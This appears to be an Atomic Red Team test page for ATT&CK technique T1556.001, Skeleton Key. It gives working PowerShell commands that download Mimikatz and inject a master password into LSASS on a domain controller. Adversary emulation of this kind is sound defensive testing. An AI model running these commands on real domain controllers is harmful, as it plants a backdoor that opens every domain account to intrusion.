T1556.001
Modify Authentication Process: Domain Controller Authentication
Description from ATT&CK
Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.
Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: Skeleton Key). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)
Atomic Tests
Atomic Test #1: Skeleton Key via Mimikatz
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC. Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
Supported Platforms: Windows
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| mimikatz_path | Path to the mimikatz executable | path | C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe |
| file_path | File path where the zipped mimikatz file is downloaded to | path | C:\ExternalPayloads\Mimikatz\mimikatz.zip |
| mimikatz_url | The URL for the mimikatz release zip | url | https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip |
| directory_path | Directory path for mimikatz | path | C:\ExternalPayloads\Mimikatz |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"Cleanup Commands
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -ForceDependencies: Run with powershell!
Description: Mimikatz must be present on the host machine at
Check Prereq Commands
if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}Get Prereq Commands
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -ForceAtomic test(s) for this technique last updated: 2026-04-16 03:09:01 UTC